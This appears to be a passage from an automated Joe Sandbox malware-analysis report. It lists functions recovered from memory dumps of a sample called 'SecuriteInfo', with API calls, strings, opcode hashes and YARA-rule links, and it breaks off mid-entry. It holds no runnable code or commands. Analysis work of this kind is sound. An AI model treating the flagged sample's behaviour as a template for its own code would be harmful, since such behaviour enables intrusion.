Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: Max$Min$RandomNumberType$invalid bit length
API String ID: 3718517217-2498579642
Opcode ID: 56780f607bfe35366619f71ed012f9411590370b41fd50881e952a948ab98b75
Instruction ID: ecb4bbaf607751144bc2fdabc1ed060c92dae6ef22fb6640e72b4db3954929aa
Opcode Fuzzy Hash: 56780f607bfe35366619f71ed012f9411590370b41fd50881e952a948ab98b75
Instruction Fuzzy Hash: 72C1C1712093809AE334CB28C950BCFBBE5AFDA304F244A1DE5A983791DB749909C763

Function 6CEFBE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6CEFBEB6

Part of subcall function 6CEFAB70: __getptd.LIBCMT ref: 6CEFAB7E
Part of subcall function 6CEFAB70: __getptd.LIBCMT ref: 6CEFAB8C

__getptd.LIBCMT ref: 6CEFBEC0

Part of subcall function 6CEFEAE6: __getptd_noexit.LIBCMT ref: 6CEFEAE9
Part of subcall function 6CEFEAE6: __amsg_exit.LIBCMT ref: 6CEFEAF6

__getptd.LIBCMT ref: 6CEFBECE
__getptd.LIBCMT ref: 6CEFBEDC
__getptd.LIBCMT ref: 6CEFBEE7
_CallCatchBlock2.LIBCMT ref: 6CEFBF0D

Part of subcall function 6CEFAC15: __CallSettingFrame@12.LIBCMT ref: 6CEFAC61

Part of subcall function 6CEFBFB4: __getptd.LIBCMT ref: 6CEFBFC3
Part of subcall function 6CEFBFB4: __getptd.LIBCMT ref: 6CEFBFD1

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 6993ef6c3590eb18a7f04eb06b3cfc5c7172219aef63ebe96181d22d2ddaf8f3
Instruction ID: 686814a672b9935c431b5e386cbfdc25bf3b603d636dfc663c9e53a8b5ee28b6
Opcode Fuzzy Hash: 6993ef6c3590eb18a7f04eb06b3cfc5c7172219aef63ebe96181d22d2ddaf8f3
Instruction Fuzzy Hash: 8611C971D00609DFDB10DFA4C545ADEBBB0FF04318F208469E824A7750DB389A5A9F50

Function 06EE0F14 Relevance: 9.0, Strings: 7, Instructions: 201COMMON

Download Yara Rule

Strings

HERE, xrefs: 06EE1086
Guq, xrefs: 06EE1243
HERE, xrefs: 06EE0F6F
LOOK, xrefs: 06EE1081
LOOK, xrefs: 06EE0F6A
p<]q, xrefs: 06EE112C
p<]q, xrefs: 06EE1177

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: HERE$HERE$LOOK$LOOK$p<]q$p<]q$Guq
API String ID: 0-1107190866
Opcode ID: ffe120279e1329eedb41feedeb19d19f539245c77890ae679fde402bc820c1f1
Instruction ID: d6ceec967b31a0498af186864351f1d26c24bd7f13bed5eb7c8dce369e84eb8a
Opcode Fuzzy Hash: ffe120279e1329eedb41feedeb19d19f539245c77890ae679fde402bc820c1f1
Instruction Fuzzy Hash: 5CA19174E002298FDBA8DF68C994BD9B7B1BB48310F1481E9D54DAB361DB309E85CF50

Function 6CEC70E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CEC7267

Strings

exceeds the maximum of , xrefs: 6CEC7309
: IV length , xrefs: 6CEC719E, 6CEC72D7
is less than the minimum of , xrefs: 6CEC71D0

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw
String ID: exceeds the maximum of $ is less than the minimum of $: IV length
API String ID: 2005118841-1273958906
Opcode ID: eb3958809b93d9f113d5275df110b63e2ecf612b879ee247a59b4667385dae6a
Instruction ID: 4f0865a25d0107c52be3d63b226ece63d8d26f56e9f449f89b0187903082f2da
Opcode Fuzzy Hash: eb3958809b93d9f113d5275df110b63e2ecf612b879ee247a59b4667385dae6a
Instruction Fuzzy Hash: CE6191B11083809FD321DB68C884FDBBBE8AF99348F104A1DE19D87741EB75990987A3

Function 6CEEAE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CEEAF27
_strncmp.LIBCMT ref: 6CEEAFA6

Strings

ThisPointer:, xrefs: 6CEEAF4B, 6CEEAFA0
ValueNames, xrefs: 6CEEAEB7

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 416fa107e01a2f78b6d66e036bfc4c625a85ec30c8e9c61058b368602311fc52
Instruction ID: a38e9a547432e179357d65790fabdbbc07cdfb1f5e654f55cf4c11bb9b07b076
Opcode Fuzzy Hash: 416fa107e01a2f78b6d66e036bfc4c625a85ec30c8e9c61058b368602311fc52
Instruction Fuzzy Hash: 795118716087405BC314CFA5C891A67BBFAAF8938CF248B5DE4E687F41C722E809C755

Function 6CECA360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CECA3F7
_strncmp.LIBCMT ref: 6CECA476

Strings

ThisPointer:, xrefs: 6CECA41B, 6CECA470
ValueNames, xrefs: 6CECA387

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 8b46ae1257ffc2fca3f50c7a820314e22527dc0a4d62b212ad336bc3d6d9356c
Instruction ID: d7db63bd9bf7657e9b44ee61d83eaf5ec27767f96cc8a43368fb7ec9a10c02c0
Opcode Fuzzy Hash: 8b46ae1257ffc2fca3f50c7a820314e22527dc0a4d62b212ad336bc3d6d9356c
Instruction Fuzzy Hash: 4051D8713487405BC3108FB5D990AA7BBFAAF8630CF248A5CE5F587B41C726E80D8752

Function 6CEEB9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CEEBA47
_strncmp.LIBCMT ref: 6CEEBAC6

Strings

ThisPointer:, xrefs: 6CEEBA6B, 6CEEBAC0
ValueNames, xrefs: 6CEEB9D7

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 62890d25d09768fb783375e093a3fd0f1ea490fcce27feddcf4fd395d7c4aed1
Instruction ID: 5323ecd043b171f3aa94834895d3464d0961609bb9365148337a65c6348197d3
Opcode Fuzzy Hash: 62890d25d09768fb783375e093a3fd0f1ea490fcce27feddcf4fd395d7c4aed1
Instruction Fuzzy Hash: 7451F971A083455BC314DF69C890E67B7FA9F8A39CF244B5CE4DA87B41C722E809C755

Function 6CED1B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CED1C1A

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

__CxxThrowException@8.LIBCMT ref: 6CED1CDE
__CxxThrowException@8.LIBCMT ref: 6CED1D3E

Strings

TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6CED1CF0
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6CED1C67

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
API String ID: 3476068407-3371871069
Opcode ID: b521874bd94efab972f3686b468aadd6acc3a50d587fc10150ac26d5d9468273
Instruction ID: bb5fadf982d57b8d1f6bce6dd055f1a69646c72e3ce73cfb28899774c850ddb5
Opcode Fuzzy Hash: b521874bd94efab972f3686b468aadd6acc3a50d587fc10150ac26d5d9468273
Instruction Fuzzy Hash: B4513D712087409FD364DF58C890F9AB7F9BFC8714F108A1DE59987790DB74E9098BA2

Function 6CEB3A90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3B71
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3B83
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB3BCF

Strings

ljl, xrefs: 6CEB3B9B, 6CEB3BA4
ljl, xrefs: 6CEB3AA3

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy
String ID: ljl$ljl
API String ID: 3651546500-1848646690
Opcode ID: 265d2498b3e4f2bdea9e96b278359b284c30f7d53ccfe030bf661e00504fe3b7
Instruction ID: 12c06cc213a51f9ac33c9701a67eb298e3cf582454deb32917b04afdb783e5d9
Opcode Fuzzy Hash: 265d2498b3e4f2bdea9e96b278359b284c30f7d53ccfe030bf661e00504fe3b7
Instruction Fuzzy Hash: 2A41BC712086019FC611CF18C8C1E6AF7F9FBC9758F244A0EF894A7754DA70EC458BA2

Function 6CE94010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF913A
Part of subcall function 6CEF9125: __CxxThrowException@8.LIBCMT ref: 6CEF914F
Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF9160

std::_Xinvalid_argument.LIBCPMT ref: 6CE94067

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

_memmove.LIBCMT ref: 6CE940C8

Strings

invalid string position, xrefs: 6CE94025
string too long, xrefs: 6CE94062

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: d49e13c049c60bd3c11e07116dcdd6158e0d4817063960575d89da7e63493448
Instruction ID: 79e381d0fcdaa1b7ec60b24761ba878007929005d4a8141c6d76fa1b7d3deb16
Opcode Fuzzy Hash: d49e13c049c60bd3c11e07116dcdd6158e0d4817063960575d89da7e63493448
Instruction Fuzzy Hash: 273195333042149BD7219E5CE880A9AF7B9EB91769F340A2FE161CBB41D7729C4187A3

Function 6CEFC23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6CEFC24E

Part of subcall function 6CEFC1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6CEFC1DF

_UnwindNestedFrames.LIBCMT ref: 6CEFC265
___FrameUnwindToState.LIBCMT ref: 6CEFC273

Strings

csm, xrefs: 6CEFC24A, 6CEFC25F, 6CEFC272, 6CEFC290, 6CEFC2A0
csm, xrefs: 6CEFC23D

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction ID: 649f3d46a3f6ded816726de326c23baae34b202fb6f8822d0b1674bc9c8dc86a
Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction Fuzzy Hash: 8F01E431501509BBEF226F91CC45EEA7F7AFF08358F204014BD6815A20D77699B3EBA4

Function 6CED2300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CED23F3
_memmove.LIBCMT ref: 6CED2460

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4c1ab574538e64ce7de734a339018c154555aabb3d6e851c632c7371a5f3a8d7
Instruction ID: 9b72a7d8863262d0bc432ce4ea8a726b44c25d1340bf0effd018367d25880e3b
Opcode Fuzzy Hash: 4c1ab574538e64ce7de734a339018c154555aabb3d6e851c632c7371a5f3a8d7
Instruction Fuzzy Hash: 8E918FB12087419FD714CF58D884A5BB7F9FB98708F214A2DE895C7B40D734ED068BA2

Function 6CEC1D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(67D4BDE6), ref: 6CEC1D91
timeGetTime.WINMM(67D4BDE6), ref: 6CEC1D9F
timeGetTime.WINMM ref: 6CEC1DBB
timeGetTime.WINMM ref: 6CEC1DC9
Sleep.KERNEL32(00000032), ref: 6CEC1DDC

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Timetime$Sleep
String ID:
API String ID: 4176159691-0
Opcode ID: 08026941f2f009d3df5a1ebc987571f6b2b5bff36fce0e602b4a6ca67a2a91ca
Instruction ID: 0cb60ba0700de90c1509d49e19b0d875a1808a45630af26ae6d276f9b610cc4c
Opcode Fuzzy Hash: 08026941f2f009d3df5a1ebc987571f6b2b5bff36fce0e602b4a6ca67a2a91ca
Instruction Fuzzy Hash: BB51C0B2F15244AFEB00DFE9C985799BFB4AB05308F24456ED41CDBB40D771D9048B92

Function 6CEA6D40 Relevance: 7.6, APIs: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

_rand.LIBCMT ref: 6CEA6DEA

Part of subcall function 6CEF9E0C: __getptd.LIBCMT ref: 6CEF9E0C

std::exception::exception.LIBCMT ref: 6CEA6E17
__CxxThrowException@8.LIBCMT ref: 6CEA6E2C
std::exception::exception.LIBCMT ref: 6CEA6E3B
__CxxThrowException@8.LIBCMT ref: 6CEA6E50

Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
String ID:
API String ID: 2791304714-0
Opcode ID: cb5f34e997309def97acba7ce385b523d0c903c34530c639b09f492fbdf8b0df
Instruction ID: 2a72988f2945621ef1da931b193a0f9e305a647fd609cab0efff7fc47b9fad17
Opcode Fuzzy Hash: cb5f34e997309def97acba7ce385b523d0c903c34530c639b09f492fbdf8b0df
Instruction Fuzzy Hash: FA3117B19007449FC760CF68C480A9AFBF4FF08314F54896ED8AA9BB41D775E609CBA1

Function 6CEA7750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CEA7761
LeaveCriticalSection.KERNEL32(00000000,?), ref: 6CEA7782
EnterCriticalSection.KERNEL32(00000018), ref: 6CEA7796
LeaveCriticalSection.KERNEL32(00000018), ref: 6CEA77CE
QueueUserWorkItem.KERNEL32(6CEC1D50,00000000,00000010), ref: 6CEA780C

Memory Dump Source

